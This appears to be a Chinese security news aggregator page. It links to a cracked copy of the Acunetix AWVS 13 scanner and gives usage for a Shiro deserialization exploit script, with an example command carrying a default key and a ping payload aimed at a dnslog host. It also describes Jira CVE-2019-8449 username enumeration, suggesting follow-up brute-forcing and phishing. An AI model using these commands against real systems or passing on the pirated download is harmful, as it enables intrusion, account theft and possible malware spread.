Aggregator
Acunetix Web Vulnerability Scanner(AWVS) 13 破解版
今天看到有群里分享Acunetix Web Vulnerability Scanner(AWVS)13的破解版本,这里分享一下~
Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ
Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g
官网介绍地址
https://www.acunetix.com/vulnerability-scanner/
注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。
CVE-2020-1938:Tomcat AJP协议文件包含漏洞分析
What Can Pandemics Teach Us About Cyber Security?
创新沙盒,罕见领域分布的背后 - RSAC 2020 (1)
New Zealand condemns malicious cyber activity against Georgia
Attacking the Organism: Financial Services
Introducing Guardicore Threat Intelligence Firewall
Tackling DGA Based Malware Detection in DNS Traffic
Pikachu靶场SQL注入刷题记录 - PaperPen
汇聚共克时艰的网安力量——“春秋杯”新春战“疫”网络安全公益赛正式启动
分享一个漏洞的发现到利用的过程
PC微信逆向--实现消息防撤回 - luoyesiqiu
Apache Shiro 反序列化漏洞利用工具使用
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境Python2.7
requests
Jdk 1.8
使用说明 usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY] OPTIONS: -h, --help show this help message and exit -u URL, --url URL Target url. -t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3 -g GADGET, --gadget GADGET gadget -p PARAMS, --params PARAMS gadget params -k KEY, --key KEY CipherKey Example: python shiro_exploit.py -u target检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
Prioritizing Vulnerability Management Using Machine Learning
inline hook原理(x86平台实现) - luoyesiqiu
At 21 Tbps, Reaching New Levels of IPv6 Traffic
CVE-2019-8449 Jira 枚举用户漏洞的利用
一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。
首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。
2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址:
Jira 8.3.4 - Information Disclosure (Username Enumeration) 。
其漏洞很简单,只需要访问 http://target/rest/api/latest/groupuserpicker?query=admin (target为目标jira系统地址)。如果返回的是json字符串就说明存在漏洞。如果返回"You are not authenticated. Authentication required to perform this operation." 则说明不存在这个漏洞。
那漏洞应该如何利用呢?
1、通过字典方式,探测用户是否存在。
2、如果存在漏洞,那么一旦匹配到结果,则会返回json格式的字符串,其中包含来用户民、邮箱、和显示的名字信息。在实际测试中发现,请求的参数不一定是用户的全拼,例如我们输入c,也是可以返回相关结果的。我们可以改变query参数的值,从a至z遍历。这样就可以获取系统中的用户名列表。
通过以上获取信息后,可以进行后续的利用。比如爆破用户密码,邮箱密码,发送钓鱼邮件等等。具体根据实际场景和相关经验进行扩展。
相关连接